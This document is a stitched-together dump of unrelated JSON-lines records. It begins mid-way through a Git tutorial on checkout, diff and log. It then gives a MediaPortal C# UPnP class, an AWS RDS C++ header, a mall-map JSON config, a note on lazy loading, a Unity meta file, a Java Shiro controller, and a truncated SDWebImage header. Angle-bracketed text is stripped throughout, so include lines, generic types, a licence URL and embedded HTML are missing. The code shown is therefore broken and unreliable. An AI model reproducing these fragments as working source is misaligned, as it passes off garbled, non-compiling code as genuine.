answer is 2. \n> > \n> > The command `git add venus.txt` places the current version of `venus.txt` into the staging area. \n> > The changes to the file from the second `echo` command are only applied to the working copy, \n> > not the version in the staging area.\n> > \n> > So, when `git commit -m \"Comment on Venus as an unsuitable base\"` is executed, \n> > the version of `venus.txt` committed to the repository is the one from the staging area and\n> > has only one line.\n> > \n> > At this time, the working copy still has the second line (and \n> > `git status` will show that the file is modified). However, `git checkout HEAD venus.txt` \n> > replaces the working copy with the most recently committed version of `venus.txt`.\n> > \n> > So, `cat venus.txt` will output \n> > ~~~\n> > Venus is beautiful and full of love.\n> > ~~~\n> > {: .output}\n> {: .solution}\n{: .challenge}\n\n> ## Checking Understanding of `git diff`\n>\n> Consider this command: `git diff HEAD~9 mars.txt`. What do you predict this command\n> will do if you execute it? What happens when you do execute it? Why?\n>\n> Try another command, `git diff [ID] mars.txt`, where [ID] is replaced with\n> the unique identifier for your most recent commit. 
What do you think will happen,\n> and what does happen?\n{: .challenge}\n\n> ## Getting Rid of Staged Changes\n>\n> `git checkout` can be used to restore a previous commit when unstaged changes have\n> been made, but will it also work for changes that have been staged but not committed?\n> Make a change to `mars.txt`, add that change, and use `git checkout` to see if\n> you can remove your change.\n{: .challenge}\n\n> ## Explore and Summarize Histories\n>\n> Exploring history is an important part of Git, and often it is a challenge to find\n> the right commit ID, especially if the commit is from several months ago.\n>\n> Imagine the `planets` project has more than 50 files.\n> You would like to find a commit that modifies some specific text in `mars.txt`.\n> When you type `git log`, a very long list appeared.\n> How can you narrow down the search?\n>\n> Recall that the `git diff` command allows us to explore one specific file,\n> e.g., `git diff mars.txt`. We can apply a similar idea here.\n>\n> ~~~\n> $ git log mars.txt\n> ~~~\n> {: .language-bash}\n>\n> Unfortunately some of these commit messages are very ambiguous, e.g., `update files`.\n> How can you search through these files?\n>\n> Both `git diff` and `git log` are very useful and they summarize a different part of the history \n> for you.\n> Is it possible to combine both? Let's try the following:\n>\n> ~~~\n> $ git log --patch mars.txt\n> ~~~\n> {: .language-bash}\n>\n> You should get a long list of output, and you should be able to see both commit messages and \n> the difference between each commit.\n>\n> Question: What does the following command do?\n>\n> ~~~\n> $ git log --patch HEAD~9 *.txt\n> ~~~\n> {: .language-bash}\n{: .challenge}\n"} {"text": "#region Copyright (C) 2007-2018 Team MediaPortal\r\n\r\n/*\r\n Copyright (C) 2007-2018 Team MediaPortal\r\n http://www.team-mediaportal.com\r\n\r\n This file is part of MediaPortal 2\r\n\r\n MediaPortal 2 is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n MediaPortal 2 is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with MediaPortal 2. If not, see .\r\n*/\r\n\r\n#endregion\r\n\r\nusing System;\r\nusing System.Xml;\r\n\r\nnamespace UPnP.Infrastructure.Dv.DeviceTree\r\n{\r\n /// \r\n /// Defines the range of allowed numeric values for a UPnP state variable.\r\n /// \r\n public class DvAllowedValueRange\r\n {\r\n protected DvDataType _dataType;\r\n protected double _minValue;\r\n protected double _maxValue;\r\n protected double? _step;\r\n\r\n public DvAllowedValueRange(DvDataType dataType, double minValue, double maxValue) :\r\n this(dataType, minValue, maxValue, null) { }\r\n\r\n public DvAllowedValueRange(DvDataType dataType, double minValue, double maxValue, double? step)\r\n {\r\n _minValue = minValue;\r\n _maxValue = maxValue;\r\n _dataType = dataType;\r\n _step = step;\r\n }\r\n\r\n public double MinValue\r\n {\r\n get { return _minValue; }\r\n }\r\n\r\n public double MaxValue\r\n {\r\n get { return _maxValue; }\r\n }\r\n\r\n public double? 
Step\r\n {\r\n get { return _step; }\r\n }\r\n\r\n public bool IsValueInRange(object value)\r\n {\r\n double doubleVal = (double) Convert.ChangeType(value, typeof(double));\r\n if (doubleVal < _minValue || doubleVal > _maxValue)\r\n return false;\r\n if (_step.HasValue)\r\n {\r\n double n = (doubleVal - _minValue) / _step.Value;\r\n return (n - (int) n) < 0.001;\r\n }\r\n return true;\r\n }\r\n\r\n #region Description generation\r\n\r\n internal void AddSCPDDescriptionForValueRange(XmlWriter writer)\r\n {\r\n writer.WriteStartElement(\"allowedValueRange\");\r\n writer.WriteStartElement(\"minimum\");\r\n _dataType.SoapSerializeValue(_minValue, true, writer);\r\n writer.WriteEndElement(); // minimum\r\n writer.WriteStartElement(\"maximum\");\r\n _dataType.SoapSerializeValue(_maxValue, true, writer);\r\n writer.WriteEndElement(); // maximum\r\n if (_step.HasValue)\r\n {\r\n writer.WriteStartElement(\"step\");\r\n _dataType.SoapSerializeValue(_step.Value, true, writer);\r\n writer.WriteEndElement(); // step\r\n }\r\n writer.WriteEndElement(); // allowedValueRange\r\n }\r\n\r\n #endregion\r\n }\r\n}\r\n"} {"text": "/**\n * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.\n * SPDX-License-Identifier: Apache-2.0.\n */\n\n#pragma once\n#include \n#include \n#include \n#include \n\nnamespace Aws\n{\ntemplate\nclass AmazonWebServiceResult;\n\nnamespace Utils\n{\nnamespace Xml\n{\n class XmlDocument;\n} // namespace Xml\n} // namespace Utils\nnamespace RDS\n{\nnamespace Model\n{\n class AWS_RDS_API CreateDBClusterResult\n {\n public:\n CreateDBClusterResult();\n CreateDBClusterResult(const Aws::AmazonWebServiceResult& result);\n CreateDBClusterResult& operator=(const Aws::AmazonWebServiceResult& result);\n\n\n \n inline const DBCluster& GetDBCluster() const{ return m_dBCluster; }\n\n \n inline void SetDBCluster(const DBCluster& value) { m_dBCluster = value; }\n\n \n inline void SetDBCluster(DBCluster&& value) { m_dBCluster = std::move(value); }\n\n \n inline CreateDBClusterResult& WithDBCluster(const DBCluster& value) { SetDBCluster(value); return *this;}\n\n \n inline CreateDBClusterResult& WithDBCluster(DBCluster&& value) { SetDBCluster(std::move(value)); return *this;}\n\n\n \n inline const ResponseMetadata& GetResponseMetadata() const{ return m_responseMetadata; }\n\n \n inline void SetResponseMetadata(const ResponseMetadata& value) { m_responseMetadata = value; }\n\n \n inline void SetResponseMetadata(ResponseMetadata&& value) { m_responseMetadata = std::move(value); }\n\n \n inline CreateDBClusterResult& WithResponseMetadata(const ResponseMetadata& value) { SetResponseMetadata(value); return *this;}\n\n \n inline CreateDBClusterResult& WithResponseMetadata(ResponseMetadata&& value) { SetResponseMetadata(std::move(value)); return *this;}\n\n private:\n\n DBCluster m_dBCluster;\n\n ResponseMetadata m_responseMetadata;\n };\n\n} // namespace Model\n} // namespace RDS\n} // namespace Aws\n"} {"text": "{\n\t\"mapwidth\": \"1000\",\n\t\"mapheight\": \"600\",\n\t\"categories\": [\n\t\t{\n\t\t\t\"id\": \"food\",\n\t\t\t\"title\": \"Fast-foods & Restaurants\",\n\t\t\t\"color\": \"#b7a6bd\",\n\t\t\t\"show\": \"false\"\n\t\t},\n\t\t{\n\t\t\t\"id\": \"dep\",\n\t\t\t\"title\": \"Department Stores\",\n\t\t\t\"color\": \"#b7a6bd\",\n\t\t\t\"show\": \"true\"\n\t\t},\n\t\t{\n\t\t\t\"id\": \"clothing\",\n\t\t\t\"title\": \"Clothing & Accessories\",\n\t\t\t\"color\": \"#b7a6bd\",\n\t\t\t\"show\": \"true\"\n\t\t},\n\t\t{\n\t\t\t\"id\": \"health\",\n\t\t\t\"title\": \"Health & 
Cosmetics\",\n\t\t\t\"color\": \"#b7a6bd\",\n\t\t\t\"show\": \"true\"\n\t\t},\n\t\t{\n\t\t\t\"id\": \"misc\",\n\t\t\t\"title\": \"Miscellaneous\",\n\t\t\t\"color\": \"#b7a6bd\",\n\t\t\t\"show\": \"true\"\n\t\t}\n\t],\n\t\"levels\": [\n\t\t{\n\t\t\t\"id\": \"basement-floor\",\n\t\t\t\"title\": \"Basement\",\n\t\t\t\"map\": \"images/mall/mall-underground.svg\",\n\t\t\t\"minimap\": \"images/mall/mall-underground-mini.jpg\",\n\t\t\t\"locations\": [\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"gap\",\n\t\t\t\t\t\"title\": \"GAP\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Lorem ipsum\",\n\t\t\t\t\t\"category\": \"clothing\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/gap.jpg\",\n\t\t\t\t\t\"x\": \"0.3781\",\n\t\t\t\t\t\"y\": \"0.4296\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"petco\",\n\t\t\t\t\t\"title\": \"Petco\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Lorem ipsum\",\n\t\t\t\t\t\"category\": \"misc\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/petco.jpg\",\n\t\t\t\t\t\"x\": \"0.5163\",\n\t\t\t\t\t\"y\": \"0.3050\"\n\t\t\t\t}\n\t\t\t]\n\t\t},\n\t\t{\n\t\t\t\"id\": \"ground-floor\",\n\t\t\t\"title\": \"Ground Floor\",\n\t\t\t\"map\": \"images/mall/mall-ground.svg\",\n\t\t\t\"minimap\": \"images/mall/mall-ground-mini.jpg\",\n\t\t\t\"show\": \"true\",\n\t\t\t\"locations\": [\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"sears\",\n\t\t\t\t\t\"title\": \"Sears\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"

Sears department store

\\\"Mapplic\\\"\",\n\t\t\t\t\t\"category\": \"dep\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/sears.jpg\",\n\t\t\t\t\t\"x\": \"0.7935\",\n\t\t\t\t\t\"y\": \"0.2736\",\n\t\t\t\t\t\"zoom\": \"3\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"macys\",\n\t\t\t\t\t\"title\": \"Macy's\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Macy's department store\",\n\t\t\t\t\t\"category\": \"dep\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/macys.jpg\",\n\t\t\t\t\t\"x\": \"0.2021\",\n\t\t\t\t\t\"y\": \"0.5847\",\n\t\t\t\t\t\"zoom\": \"3\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"jcpenney\",\n\t\t\t\t\t\"title\": \"JCPenney\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"JCPenney department store\",\n\t\t\t\t\t\"image\": \"images/hq.jpg\",\n\t\t\t\t\t\"category\": \"dep\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/jcpenney.jpg\",\n\t\t\t\t\t\"link\": \"http://codecanyon.net/user/sekler?ref=sekler\",\n\t\t\t\t\t\"x\": \"0.6651\",\n\t\t\t\t\t\"y\": \"0.6734\",\n\t\t\t\t\t\"zoom\": \"3\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"walgreens\",\n\t\t\t\t\t\"title\": \"Walgreens\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"At the corner of Happy & Healthy\",\n\t\t\t\t\t\"category\": \"health\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/walgreens.jpg\",\n\t\t\t\t\t\"x\": \"0.4611\",\n\t\t\t\t\t\"y\": \"0.5426\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"sephora\",\n\t\t\t\t\t\"title\": \"Sephora\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Makeup, fragrance, skincare\",\n\t\t\t\t\t\"category\": \"health\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/sephora.jpg\",\n\t\t\t\t\t\"link\": \"http://codecanyon.net/user/sekler?ref=sekler\",\n\t\t\t\t\t\"x\": \"0.7504\",\n\t\t\t\t\t\"y\": \"0.5211\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"belk\",\n\t\t\t\t\t\"title\": \"Belk\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"

Lorem ipsum

\\\"Mapplic\\\"\",\n\t\t\t\t\t\"category\": \"clothing\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/belk.jpg\",\n\t\t\t\t\t\"link\": \"http://codecanyon.net/user/sekler?ref=sekler\",\n\t\t\t\t\t\"x\": \"0.3947\",\n\t\t\t\t\t\"y\": \"0.5444\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"hnm\",\n\t\t\t\t\t\"title\": \"H&M\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Lorem ipsum\",\n\t\t\t\t\t\"category\": \"clothing\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/hm.jpg\",\n\t\t\t\t\t\"x\": \"0.5431\",\n\t\t\t\t\t\"y\": \"0.5240\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"oldnavy\",\n\t\t\t\t\t\"title\": \"Old Navy\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Lorem ipsum\",\n\t\t\t\t\t\"category\": \"clothing\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/oldnavy.jpg\",\n\t\t\t\t\t\"x\": \"0.3688\",\n\t\t\t\t\t\"y\": \"0.3909\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"sportchek\",\n\t\t\t\t\t\"title\": \"Sport Chek\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"\\\"Mapplic\\\"

Lorem ipsum

\",\n\t\t\t\t\t\"category\": \"clothing\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/sportchek.jpg\",\n\t\t\t\t\t\"x\": \"0.6243\",\n\t\t\t\t\t\"y\": \"0.3055\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"starbucks\",\n\t\t\t\t\t\"title\": \"Starbucks\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"The coffee company\",\n\t\t\t\t\t\"category\": \"food\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/starbucks.jpg\",\n\t\t\t\t\t\"x\": \"0.6445\",\n\t\t\t\t\t\"y\": \"0.4478\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"zara\",\n\t\t\t\t\t\"title\": \"Zara\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"\\\"Mapplic\\\"

Lorem ipsum

\",\n\t\t\t\t\t\"category\": \"clothing\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/zara.jpg\",\n\t\t\t\t\t\"link\": \"http://codecanyon.net/user/sekler?ref=sekler\",\n\t\t\t\t\t\"x\": \"0.4785\",\n\t\t\t\t\t\"y\": \"0.3173\"\n\t\t\t\t}\n\t\t\t]\n\t\t},\n\t\t{\n\t\t\t\"id\": \"first-floor\",\n\t\t\t\"title\": \"First Floor\",\n\t\t\t\"map\": \"images/mall/mall-level1.svg\",\n\t\t\t\"minimap\": \"images/mall/mall-level1-mini.jpg\",\n\t\t\t\"locations\": [\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"applebees\",\n\t\t\t\t\t\"title\": \"Applebee's\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"See you tomorrow\",\n\t\t\t\t\t\"category\": \"food\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/applebees.jpg\",\n\t\t\t\t\t\"x\": \"0.7465\",\n\t\t\t\t\t\"y\": \"0.2769\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"kfc\",\n\t\t\t\t\t\"title\": \"KFC\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Kentucky Fried Chicken\",\n\t\t\t\t\t\"category\": \"food\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/kfc.jpg\",\n\t\t\t\t\t\"x\": \"0.7488\",\n\t\t\t\t\t\"y\": \"0.4997\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"mcdonalds\",\n\t\t\t\t\t\"title\": \"McDonald's\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Additional information\",\n\t\t\t\t\t\"category\": \"food\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/mcdonalds.jpg\",\n\t\t\t\t\t\"link\": \"http://codecanyon.net/user/sekler?ref=sekler\",\n\t\t\t\t\t\"x\": \"0.7374\",\n\t\t\t\t\t\"y\": \"0.3918\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"pizzahut\",\n\t\t\t\t\t\"title\": \"Pizza Hut\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Make it great\",\n\t\t\t\t\t\"category\": \"food\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/pizzahut.jpg\",\n\t\t\t\t\t\"x\": \"0.6267\",\n\t\t\t\t\t\"y\": \"0.3151\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"subway\",\n\t\t\t\t\t\"title\": \"Subway\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Eat fresh.\",\n\t\t\t\t\t\"category\": \"food\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/subway.jpg\",\n\t\t\t\t\t\"x\": \"0.7092\",\n\t\t\t\t\t\"y\": \"0.5232\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"cvs\",\n\t\t\t\t\t\"title\": \"CVS Pharmacy\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Lorem ipsum dolor sit amet, consectetur.\",\n\t\t\t\t\t\"category\": \"health\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/cvs.jpg\",\n\t\t\t\t\t\"link\": \"http://codecanyon.net/user/sekler?ref=sekler\",\n\t\t\t\t\t\"x\": \"0.5104\",\n\t\t\t\t\t\"y\": \"0.2771\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"pullnbear\",\n\t\t\t\t\t\"title\": \"Pull & Bear\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Lorem ipsum\",\n\t\t\t\t\t\"category\": \"clothing\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/pullbear.jpg\",\n\t\t\t\t\t\"x\": \"0.4846\",\n\t\t\t\t\t\"y\": \"0.3246\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"amc\",\n\t\t\t\t\t\"title\": \"AMC Theatres\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Additional information\",\n\t\t\t\t\t\"category\": \"misc\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/amc.jpg\",\n\t\t\t\t\t\"x\": \"0.6640\",\n\t\t\t\t\t\"y\": \"0.6426\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"id\": \"atnt\",\n\t\t\t\t\t\"title\": \"AT&T\",\n\t\t\t\t\t\"about\": \"Lorem ipsum\",\n\t\t\t\t\t\"description\": \"Additional information\",\n\t\t\t\t\t\"category\": \"misc\",\n\t\t\t\t\t\"thumbnail\": \"images/thumbs/att.jpg\",\n\t\t\t\t\t\"x\": 
\"0.3750\",\n\t\t\t\t\t\"y\": \"0.5391\"\n\t\t\t\t}\n\t\t\t]\n\t\t}\n\t]\n}"} {"text": "# Lazy Loading\n\n## [Krzysztof Grzybek](https://github.com/krzysztof-grzybek)\n\nLazy loading is a pattern in which we delay loading the data until it's actually needed. Lazy loading data from the database is usually achieved by Implementing proper Proxy class.\n\nIt might be useful if we have an object which requires a lot of data to be fetched from the database, but probably we don't need all the data in every case. It might reduce object initialization phase and memory usage.\n\nOn the other hand, we might end up with a lot of database queries to get small chunks of data, and it might cause performance problems. It's not so hard to do that because lazy loading is a very leaking abstraction.\n\nAnother pitfall, probably more important is that we might work with inconsistent data. If we loaded user data first, and then after some time we loaded user orders, we can't be sure that the orders data wasn't modified already by someone else.\n"} {"text": "fileFormatVersion: 2\nguid: 2e3b9bbf2c1a3cd4f88883ca32882ec6\nMonoImporter:\n externalObjects: {}\n serializedVersion: 2\n defaultReferences: []\n executionOrder: 0\n icon: {instanceID: 0}\n userData: \n assetBundleName: \n assetBundleVariant: \n"} {"text": "/*\n * Copyright (c) 2018\n * All rights reserved.\n * 2018-08-22 19:58:32\n */\npackage com.ueboot.shiro.controller.resources;\n\nimport com.alibaba.fastjson.JSON;\nimport com.ueboot.core.http.response.Response;\nimport com.ueboot.shiro.controller.resources.vo.*;\nimport com.ueboot.shiro.entity.Resources;\nimport com.ueboot.shiro.service.resources.ResourcesService;\nimport com.ueboot.shiro.shiro.ShiroEventListener;\nimport jodd.util.StringUtil;\nimport lombok.extern.slf4j.Slf4j;\nimport org.apache.shiro.SecurityUtils;\nimport org.apache.shiro.authz.annotation.RequiresPermissions;\nimport org.apache.shiro.util.Assert;\nimport org.springframework.beans.BeanUtils;\nimport org.springframework.data.domain.Page;\nimport org.springframework.data.domain.Pageable;\nimport org.springframework.data.domain.Sort;\nimport org.springframework.data.web.PageableDefault;\nimport org.springframework.web.bind.annotation.*;\n\nimport javax.annotation.Resource;\nimport java.util.ArrayList;\nimport java.util.HashMap;\nimport java.util.List;\nimport java.util.Map;\n\n\n/**\n * Created on 2018-08-22 19:58:32\n *\n * @author yangkui\n * @since 2.1.0 by ueboot-generator\n */\n@Slf4j\n@RestController\n@RequestMapping(value = \"/ueboot/resources\")\npublic class ResourcesController {\n\n @Resource\n private ResourcesService resourcesService;\n\n // shiro权限记录\n @Resource\n private ShiroEventListener shiroEventListener;\n\n @RequiresPermissions(\"ueboot:resources:read\")\n @PostMapping(value = \"/list\")\n public Response> list() {\n List all = this.resourcesService.findAll();\n List retval = new ArrayList<>();\n all.forEach((r) -> {\n ResourcesResp resp = new ResourcesResp();\n BeanUtils.copyProperties(r, resp);\n if (r.getParent() != null) {\n resp.setParentId(r.getParent().getId());\n }\n retval.add(resp);\n });\n return new Response<>(retval);\n }\n\n\n @RequiresPermissions(\"ueboot:resources:read\")\n @PostMapping(value = \"/page\")\n public Response> page(@PageableDefault(value = 15, sort = {\"id\"}, direction = Sort.Direction.ASC)\n Pageable pageable, @RequestBody(required = false) ResourcesFindReq req) {\n Page entities = null;\n entities = resourcesService.findByParentId(pageable, req.getParentId());\n Page body = 
entities.map(entity -> {\n ResourcesResp resp = new ResourcesResp();\n BeanUtils.copyProperties(entity, resp);\n if (entity.getParent() != null) {\n resp.setParentId(entity.getParent().getId());\n }\n return resp;\n });\n\n return new Response<>(body);\n }\n\n\n @RequiresPermissions(\"ueboot:resources:save\")\n @PostMapping(value = \"/save\")\n public Response save(@RequestBody ResourcesReq req) {\n Resources entity = null;\n if (req.getId() == null) {\n entity = new Resources();\n } else {\n entity = resourcesService.get(req.getId());\n }\n BeanUtils.copyProperties(req, entity);\n //菜单样式配置\n Map theme = new HashMap<>();\n if (StringUtil.isNotBlank(req.getIconName())) {\n theme.put(\"iconName\", req.getIconName());\n }\n if (StringUtil.isNotBlank(req.getFontColor())) {\n theme.put(\"fontColor\", req.getFontColor());\n }\n if (theme.size() > 0) {\n entity.setThemeJson(JSON.toJSONString(theme));\n } else {\n entity.setThemeJson(null);\n }\n if (req.getParentId() != 0L) {\n Resources parent = resourcesService.findById(req.getParentId());\n Assert.notNull(parent, \"父节点不存在\");\n entity.setParent(parent);\n entity.setParentName(parent.getName());\n } else {\n entity.setParent(null);\n entity.setParentName(null);\n }\n\n resourcesService.save(entity);\n\n // 保存/修改资源日志记录\n String optUserName = (String) SecurityUtils.getSubject().getPrincipal();\n this.shiroEventListener.saveResourceEvent(optUserName, req.getName());\n return new Response<>();\n }\n\n @RequiresPermissions(\"ueboot:resources:delete\")\n @PostMapping(value = \"/delete\")\n public Response delete(Long[] id) {\n resourcesService.deleteResource(id);\n return new Response<>();\n }\n\n @RequiresPermissions(\"ueboot:resources:read\")\n @GetMapping(value = \"/{id}\")\n public Response get(@PathVariable Long id) {\n Resources entity = resourcesService.get(id);\n ResourcesResp resp = new ResourcesResp();\n BeanUtils.copyProperties(entity, resp);\n return new Response<>(resp);\n }\n\n}\n"} {"text": "/*\n * This file is part of the SDWebImage package.\n * (c) Olivier Poitrey \n *\n * For the full copyright and license information, please view the LICENSE\n * file that was distributed with this source code.\n */\n\n#import \n#import \"SDWebImageDownloader.h\"\n#import \"SDWebImageOperation.h\"\n\n/**\n Describes a downloader operation. 
If one wants to use a custom downloader op, it needs to inherit from `NSOperation` and conform to this protocol\n For the description about these methods, see `SDWebImageDownloaderOperation`\n @note If your custom operation class does not use `NSURLSession` at all, do not implement the optional methods and session delegate methods.\n */\n@protocol SDWebImageDownloaderOperation \n@required\n- (nonnull instancetype)initWithRequest:(nullable NSURLRequest *)request\n inSession:(nullable NSURLSession *)session\n options:(SDWebImageDownloaderOptions)options;\n\n- (nonnull instancetype)initWithRequest:(nullable NSURLRequest *)request\n inSession:(nullable NSURLSession *)session\n options:(SDWebImageDownloaderOptions)options\n context:(nullable SDWebImageContext *)context;\n\n- (nullable id)addHandlersForProgress:(nullable SDWebImageDownloaderProgressBlock)progressBlock\n completed:(nullable SDWebImageDownloaderCompletedBlock)completedBlock;\n\n- (BOOL)cancel:(nullable id)token;\n\n@property (strong, nonatomic, readonly, nullable) NSURLRequest *request;\n@property (strong, nonatomic, readonly, nullable) NSURLResponse *response;\n\n@optional\n@property (strong, nonatomic, readonly, nullable) NSURLSessionTask *dataTask;\n@property (strong, nonatomic, nullable) NSURLCredential *credential;\n@property (assign, nonatomic) double minimumProgressInterval;\n\n@end\n\n\n/**\n The download operation class for SDWebImageDownloader.\n */\n@interface SDWebImageDownloaderOperation : NSOperation \n\n/**\n * The request used by the operation's task.\n */\n@property (strong, nonatomic, readonly, nullable) NSURLRequest *request;\n\n/**\n * The response returned by the operation's task.\n */\n@property (strong, nonatomic, readonly, nullable) NSURLResponse *response;\n\n/**\n * The operation's task\n */\n@property (strong, nonatomic, readonly, nullable) NSURLSessionTask *dataTask;\n\n/**\n * The credential used for authentication challenges in `-URLSession:task:didReceiveChallenge:completionHandler:`.\n *\n * This will be overridden by any shared credentials that exist for the username or password of the request URL, if present.\n */\n@property (strong, nonatomic, nullable) NSURLCredential *credential;\n\n/**\n * The minimum interval about progress percent during network downloading. Which means the next progress callback and current progress callback's progress percent difference should be larger or equal to this value. 
However, the final finish download progress callback does not get effected.\n * The value should be 0.0-1.0.\n * @note If you're using progressive decoding feature, this will also effect the image refresh rate.\n * @note This value may enhance the performance if you don't want progress callback too frequently.\n * Defaults to 0, which means each time we receive the new data from URLSession, we callback the progressBlock immediately.\n */\n@property (assign, nonatomic) double minimumProgressInterval;\n\n/**\n * The options for the receiver.\n */\n@property (assign, nonatomic, readonly) SDWebImageDownloaderOptions options;\n\n/**\n * The context for the receiver.\n */\n@property (copy, nonatomic, readonly, nullable) SDWebImageContext *context;\n\n/**\n * Initializes a `SDWebImageDownloaderOperation` object\n *\n * @see SDWebImageDownloaderOperation\n *\n * @param request the URL request\n * @param session the URL session in which this operation will run\n * @param options downloader options\n *\n * @return the initialized instance\n */\n- (nonnull instancetype)initWithRequest:(nullable NSURLRequest *)request\n inSession:(nullable NSURLSession *)session\n options:(SDWebImageDownloaderOptions)options;\n\n/**\n * Initializes a `SDWebImageDownloaderOperation` object\n *\n * @see SDWebImageDownloaderOperation\n *\n * @param request the URL request\n * @param session the URL session in which this operation will run\n * @param options downloader options\n * @param context A context contains different options to perform specify changes or processes, see `SDWebImageContextOption`. This hold the extra objects which `options` enum can not hold.\n *\n * @return the initialized instance\n */\n- (nonnull instancetype)initWithRequest:(nullable NSURLRequest *)request\n inSession:(nullable NSURLSession *)session\n options:(SDWebImageDownloaderOptions)options\n context:(nullable SDWebImageContext *)context NS_DESIGNATED_INITIALIZER;\n\n/**\n * Adds handlers for progress and completion. Returns a tokent that can be passed to -cancel: to cancel this set of\n * callbacks.\n *\n * @param progressBlock the block executed when a new chunk of data arrives.\n * @note the progress block is executed on a background queue\n * @param completedBlock the block executed when the download is done.\n * @note the completed block is executed on the main queue for success. If errors are found, there is a chance the block will be executed on a background queue\n *\n * @return the token to use to cancel this set of handlers\n */\n- (nullable id)addHandlersForProgress:(nullable SDWebImageDownloaderProgressBlock)progressBlock\n completed:(nullable SDWebImageDownloaderCompletedBlock)completedBlock;\n\n/**\n * Cancels a set of callbacks. Once all callbacks are canceled, the operation is cancelled.\n *\n * @param token the token representing a set of callbacks to cancel\n *\n * @return YES if the operation was stopped because this was the last token to be canceled. 
